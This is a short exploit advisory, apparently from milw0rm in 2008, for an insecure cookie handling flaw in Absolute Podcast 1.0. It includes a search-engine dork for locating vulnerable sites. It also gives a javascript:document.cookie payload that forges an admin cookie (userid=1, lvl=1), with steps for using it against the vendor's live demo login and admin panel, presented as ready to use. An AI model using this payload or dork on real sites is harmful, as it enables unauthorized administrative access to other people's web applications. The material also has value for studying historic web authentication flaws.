1 ###############################################################################################
2 _____ ____ __ ___ ______ ______ | ____ _____ _____
3 | / ___| \ \ / / / ____| / | | | | _ \ |
4 |_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____
5 | | |_ || | | | |____ | | | | | | _ | |
6 |_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______|
7
8 # Discovered By : Hakxer
9 # Home : Www.educ−up.com
10 # Type Gap : Insecure cookie handling
11 # script : Absloute Podcast V 1.0 [see script] http://www.xigla.com/apodcasting/demo.htm
12 # Greetz : Allah , Egyptian x Hacker , all my team , All educ−up member
13 # Team : EgY Coders
14 #################################################################################################
15
16 # Dork : "Powered by Absolute Podcast "
17
18 # Poc
19 ==> javascript:document.cookie="xlaAPCuser=userid=1&lvl=1&s=";
20
21 # Live Script
22
23 # First go to Admin panel : http://www.xigla.com/apodcasting/demo/login.aspx
24 # [~] javascript:document.cookie="xlaAPCuser=userid=1&lvl=1&s=";
25 # Second Go to http://www.xigla.com/apodcasting/demo/menu.aspx
26 # See Admin panel ..
27
28 # Have Fun :D
29
30 ###############################################################################
31
32 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− The End of Gap −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
33
34 ## Contact : aq5@windowslive.com
35 ### Muslim Hacker .. I love you Mohammed Rasull Allah
36 ######################################################
37
38 # milw0rm.com [2008−10−30]
Page 1/1
Absolute Podcast 1.0 Remote Insecure Cookie Handling Vulnerability
Hakxer
10/30/2008